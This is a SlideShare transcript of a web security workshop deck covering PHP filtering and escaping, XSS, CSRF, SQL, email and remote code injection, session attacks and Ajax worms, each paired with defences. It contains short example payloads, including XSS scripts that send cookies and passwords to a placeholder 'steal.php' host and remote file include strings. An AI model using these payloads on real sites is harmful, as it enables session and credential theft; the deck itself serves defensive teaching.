SlideShare a Scribd company logo

Evolution Of Web Security

Chris Shiflett
Chris Shiflett

This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Technology
1 of 63
Download to read offline
Evolution of Web Security Chris Shiflett @shiflett • shiflett.org
Web developer from Brooklyn, NY, and Who am I? founding member of Analog, a web design & development co-operative.
1. Fundamentals
Three Principles Defense in depth — Redundant safeguards are valuable. Least privilege — Grant as little freedom as possible. Least complicated — Complexity breeds mistakes.
Two Practices Filter input. — Ensure data coming in is valid. Escape output. — Ensure data going out is not misinterpreted.
Filter input. Escape output. Filter Application Escape
<?php $clean = array(); if (ctype_alpha($_POST['name'])) {     $clean['name'] = $_POST['name']; } else { /* Error */ } ?>
<?php $clean = array(); switch ($_POST['color']) {     case 'red':     case 'green':     case 'blue':         $clean['color'] = $_POST['color'];         break;     default:         /* Error */         break; } ?>
<?php $clean = array(); $colors = array('red', 'green', 'blue'); if (in_array($_POST['color'], $colors)) {     $clean['color'] = $_POST['color']; } else {     /* Error */ } ?>
<?php $clean = array(); $colors = array(); $colors['red'] = ''; $colors['green'] = ''; $colors['blue'] = ''; if (isset($colors[$_POST['color']])) {     $clean['color'] = $_POST['color']; } else {     /* Error */ } ?>
<?php $clean = array(); if (preg_match('/^d{5}$/', $_POST['zip'])) {     $clean['zip'] = $_POST['zip']; } else {     /* Error */ } ?>
<?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome, {$html['user']}.</p>"; ?>
Exploits Cross-Site Session Scripting Hijacking Cross-Site Email Injection Request Forgeries Remote Code Injection SQL Injection Session Fixation
Cross-Site Scripting 1 2 HTML Attacker XSS Target Victim XSS
echo $_GET['user']; http://host/foo.php?user=%3Cscript%3E… echo '<script>…';
Steal Cookies <script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
Steal Passwords <script> document.forms[0].action = 'http://host/steal.php'; </script>
Steal Saved Passwords <form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="display: none" /> <input type="password" name="password" style="display: none" /> <input type="image" src="image.png" /> </form>
Short & Simple <script src="http://host/evil.js"></script>
Character Encoding $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7');   echo htmlentities($string); Google XSS Example http://shiflett.org/blog/2005/dec/google-xss-example
Stop It! FIEO. Use valid HTML. — http://validator.w3.org/ Use existing solutions. — PHP developers, use htmlentities() or htmlspecialchars(). — Make sure you indicate the character encoding! Need to allow HTML? — Use HTML Purifier, even if you’re not using PHP: http://htmlpurifier.org/
Cross-Site Request Forgeries 1 2 Attacker ? Victim CSRF Target
CSRF Because the attack is carried out by the victim, CSRF can bypass: — HTTP auth — Session-based auth — Firewalls — &c.
<form action="buy.php" method="post"> <input type="hidden" name="isbn" value="059600656X" /> <input type="submit" value="Buy" /> </form> Buy POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X
Forging GET <img src="http://host/buy.php?isbn=059600656X" /> GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie: PHPSESSID=1234
Forging POST <iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" method="post" target="secret"> <input type="hidden" name="isbn" value="059600656X" /> </form> <script type="text/javascript">document.buy.submit();</script> POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X
CSRF Exploits Amazon (Fixed?) http://shiflett.org/amazon.php Digg (Fixed) http://4diggers.blogspot.com/
Steal Cookies (Improved) <script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
Stop It! $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8'); <input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
SQL Injection 1 2 SQL Attacker SQL Target Database SQL
SELECT count(*) FROM users WHERE username = '{$_POST['username']}' AND password = '…' chris' /* SELECT count(*) FROM users WHERE username = 'chris' /*' AND password = '…'
Stop It! FIEO. Use prepared statements. — PHP developers, use PDO. addslashes() Versus mysql_real_escape_string() http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
Session Fixation http://host/login.php?PHPSESSID=1234
Stop It! Regenerate the session identifier. — PHP developers, session_regenerate_id(TRUE). Do this whenever the privilege level changes.
Session Hijacking Attacker impersonates a victim. In PHP, by default, only requires a valid session identifier. Session identifier obtained using: — Prediction — Capture — Fixation
Stop It! Understand how sessions work. Minimize session identifier exposure. — SSL — Separate domain for embedded resources Trending — https://panopticlick.eff.org/ — More on this later…
Email Injection mail('chris@example.org', 'Feedback', '...', "From: {$_POST['email']}"); fake@example.orgrnBcc: victim@example.orgrnBcc: … To: chris@example.org Subject: Feedback From: fake@example.org Bcc: victim@example.org Bcc: …
Stop It! FIEO. — http://iamcal.com/publish/articles/php/parsing_email — PHP developers, use ctype_print() as defense in depth.
Remote Code Injection Attacker Target
include "{$_COOKIE['type']}.php"; Cookie: type=http://host/inject.inc? include "http://host/inject.inc?.php";
Remote Code Injection This example exploits allow_url_fopen. PHP 5 has allow_url_include. — By default, allow_url_include is disabled.
include "{$_GET['type']}.php"; POST /script.php?type=php://input%00 HTTP/1.1 Host: host Content-Type: application/x-www-form-urlencoded Content-Length: ? ? include "php://input";
Stop It! FIEO. — If at all possible, use a white list.
2. Emerging Trends
Ajax “The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what’s possible on the Web.” — Jesse James Garrett
Ajax “Client-side techniques & technologies that allow two-way communication between the client and the server without reloading the page.”
Cross-Domain Ajax Victim 1. XMLHttpRequest Target 2. HTML form + victim’s token JS 3. XMLHttpRequest + victim’s token
XSS + Ajax + CSRF Victim 1. XMLHttpRequest Target 2. HTML form + victim’s token XSS 3. XMLHttpRequest + victim’s token
Worms XSS is a perfect platform for CSRF. CSRF attacks can exploit XSS vulnerabilities. Victims can become attackers. Rinse. Repeat.
Browser Hijacking http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking Myspace CSRF and XSS Worm (Samy) http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Cross-Domain Ajax <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Thanks, Flash!
Cross-Domain Ajax domain="*" API domain Vulnerable? No yahoo.com No No youtube.com No Yes api.flickr.com No Yes No adobe.com Yes No
JavaScript Hijacking 1 2 Attacker ? Victim CSRF Target 4 3
<script src="http://host/json.php"></script> [{"email": "chris@shiflett.org"}] JavaScript Hijacking Demo http://mochikit.com/fortify_fud/
JavaScript Hijacking “If you audit your application for CSRF flaws, you’ve defeated this attack. Moreover, the well-known, pre-existing exploits for CSRF are actually worse than this attack.” — Thomas Ptacek
3. Ideas for the Future
Trending “When you visit a web site, you are allowing that site to access a lot of information about your computer’s configuration. Combined, this information can create a kind of fingerprint — a signature that could be used to identify you and your computer.” Panopticlick https://panopticlick.eff.org/
Trending “Not the intent, but Panopticlick from @eff would be useful for preventing session hijacking.” — http://twitter.com/shiflett/status/8562663352
Trending Establish trends to help detect anomalies. Trends can be based on identity or behavior. Trending is imperfect; use as defense in depth.
Security-Centered Design Webstock 2010 Thursday, 18 February After lunch (13:25) Illot Theatre
Slides http://slideshare.net/shiflett http://shiflett.org/evolution-of-web-security.pdf
Feedback? Follow me on Twitter. — @shiflett Comment on my blog. — shiflett.org Email me. — chris@shiflett.org Work with me. — analog.coop

Recommended

OT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security SuccessOT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security Successaccenture
 
Web security
Web securityWeb security
Web securitykareem zock
 
Common Practice in Data Privacy Program Management
Common Practice in Data Privacy Program ManagementCommon Practice in Data Privacy Program Management
Common Practice in Data Privacy Program ManagementEryk Budi Pratama
 
Physical security
Physical securityPhysical security
Physical securityTariq Mahmood
 
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend Micro
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend MicroRoadmap of Cyber-security from On-Prem to Cloud Journey - Trend Micro
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend MicroPrime Infoserv
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
GRC Fundamentals
GRC FundamentalsGRC Fundamentals
GRC Fundamentals3Sixty Insights
 
Penetration testing
Penetration testing Penetration testing
Penetration testing PTC
 

Recommended

OT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security SuccessOT Security Architecture & Resilience: Designing for Security Success
OT Security Architecture & Resilience: Designing for Security Successaccenture
 
Web security
Web securityWeb security
Web securitykareem zock
 
Common Practice in Data Privacy Program Management
Common Practice in Data Privacy Program ManagementCommon Practice in Data Privacy Program Management
Common Practice in Data Privacy Program ManagementEryk Budi Pratama
 
Physical security
Physical securityPhysical security
Physical securityTariq Mahmood
 
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend Micro
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend MicroRoadmap of Cyber-security from On-Prem to Cloud Journey - Trend Micro
Roadmap of Cyber-security from On-Prem to Cloud Journey - Trend MicroPrime Infoserv
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
GRC Fundamentals
GRC FundamentalsGRC Fundamentals
GRC Fundamentals3Sixty Insights
 
Penetration testing
Penetration testing Penetration testing
Penetration testing PTC
 
Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016Aujas
 
Security Audit View
Security Audit ViewSecurity Audit View
Security Audit ViewPLN9 Security Services Pvt. Ltd.
 
Cyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial ServicesCyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial ServicesKevin Duffey
 
Security architecture, engineering and operations
Security architecture, engineering and operationsSecurity architecture, engineering and operations
Security architecture, engineering and operationsPiyush Jain
 
03 cia
03 cia03 cia
03 ciaJadavsejal
 
Brief introduction to digital forensics
Brief introduction to digital forensicsBrief introduction to digital forensics
Brief introduction to digital forensicsMarco Alamanni
 
Technology Alignment Framework
Technology Alignment FrameworkTechnology Alignment Framework
Technology Alignment FrameworkMark S. Mahre
 
Information security
Information securityInformation security
Information securityLusungu Mkandawire CISA,CISM,CGEIT,CPF,PRINCE2
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxnikshaikh786
 
Cybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation SlidesCybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation SlidesSlideTeam
 
SPF, DKIM en DMARC
SPF, DKIM en DMARCSPF, DKIM en DMARC
SPF, DKIM en DMARCJeffrey Cafferata
 
Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015Bill Ross
 
Third Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best PracticeThird Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best PracticeDVV Solutions Third Party Risk Management
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
Akamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Technologies
 
Sensitive Data Exposure
Sensitive Data ExposureSensitive Data Exposure
Sensitive Data Exposureabodiford
 
Dark Web Forensics
Dark Web Forensics Dark Web Forensics
Dark Web Forensics Deepak Kumar (D3)
 
Incident Response
Incident Response Incident Response
Incident Response InnoTech
 
What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?Entrance Exam Info
 
How to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk ResilienceHow to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk ResiliencePriyanka Aash
 
Web Security
Web SecurityWeb Security
Web SecurityTripad M
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered DesignChris Shiflett
 

More Related Content

What's hot

Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016Aujas
 
Cyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial ServicesCyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial ServicesKevin Duffey
 
Security architecture, engineering and operations
Security architecture, engineering and operationsSecurity architecture, engineering and operations
Security architecture, engineering and operationsPiyush Jain
 
Brief introduction to digital forensics
Brief introduction to digital forensicsBrief introduction to digital forensics
Brief introduction to digital forensicsMarco Alamanni
 
Technology Alignment Framework
Technology Alignment FrameworkTechnology Alignment Framework
Technology Alignment FrameworkMark S. Mahre
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxnikshaikh786
 
Cybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation SlidesCybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation SlidesSlideTeam
 
Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015Bill Ross
 
Third Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best PracticeThird Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best PracticeDVV Solutions Third Party Risk Management
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023PECB
 
Akamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Technologies
 
Sensitive Data Exposure
Sensitive Data ExposureSensitive Data Exposure
Sensitive Data Exposureabodiford
 
Incident Response
Incident Response Incident Response
Incident Response InnoTech
 
What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?Entrance Exam Info
 
How to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk ResilienceHow to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk ResiliencePriyanka Aash
 

What's hot (20)

Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016Identity and Access Management Playbook CISO Platform 2016
Identity and Access Management Playbook CISO Platform 2016
 
Security Audit View
Security Audit ViewSecurity Audit View
Security Audit View
 
Cyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial ServicesCyber Resilience: managing 3rd Party Risks in Financial Services
Cyber Resilience: managing 3rd Party Risks in Financial Services
 
Security architecture, engineering and operations
Security architecture, engineering and operationsSecurity architecture, engineering and operations
Security architecture, engineering and operations
 
03 cia
03 cia03 cia
03 cia
 
Brief introduction to digital forensics
Brief introduction to digital forensicsBrief introduction to digital forensics
Brief introduction to digital forensics
 
Technology Alignment Framework
Technology Alignment FrameworkTechnology Alignment Framework
Technology Alignment Framework
 
Information security
Information securityInformation security
Information security
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptx
 
Cybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation SlidesCybersecurity Incident Management PowerPoint Presentation Slides
Cybersecurity Incident Management PowerPoint Presentation Slides
 
SPF, DKIM en DMARC
SPF, DKIM en DMARCSPF, DKIM en DMARC
SPF, DKIM en DMARC
 
Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015Security architecture analyses brief 21 april 2015
Security architecture analyses brief 21 april 2015
 
Third Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best PracticeThird Party Risk Assessment Due Diligence - Managed Service as Best Practice
Third Party Risk Assessment Due Diligence - Managed Service as Best Practice
 
Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023Cybersecurity trends - What to expect in 2023
Cybersecurity trends - What to expect in 2023
 
Akamai Intelligent Edge Security
Akamai Intelligent Edge SecurityAkamai Intelligent Edge Security
Akamai Intelligent Edge Security
 
Sensitive Data Exposure
Sensitive Data ExposureSensitive Data Exposure
Sensitive Data Exposure
 
Dark Web Forensics
Dark Web Forensics Dark Web Forensics
Dark Web Forensics
 
Incident Response
Incident Response Incident Response
Incident Response
 
What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?What is Cybercrime and How to Prevent Cybercrime?
What is Cybercrime and How to Prevent Cybercrime?
 
How to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk ResilienceHow to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
How to Steer Cyber Security with Only One KPI: The Cyber Risk Resilience
 

Viewers also liked

Web Security
Web SecurityWeb Security
Web SecurityTripad M
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered DesignChris Shiflett
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defenseJose Mato
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudITDogadjaji.com
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Canada
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web SecurityBill Condo
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web securityjeyaselvir
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site SecuritySteven Cahill
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityYnon Perek
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 

Viewers also liked (20)

Web Security
Web SecurityWeb Security
Web Security
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered Design
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Web Security
Web SecurityWeb Security
Web Security
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and Cloud
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web Security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
 
Web security
Web securityWeb security
Web security
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Extreme security in web servers
Extreme security in web serversExtreme security in web servers
Extreme security in web servers
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Web Security
Web SecurityWeb Security
Web Security
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 

Similar to Evolution Of Web Security

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 

Similar to Evolution Of Web Security (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
XSS
XSSXSS
XSS
 
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 

Recently uploaded

Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Mark Simos
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsYoss Cohen
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
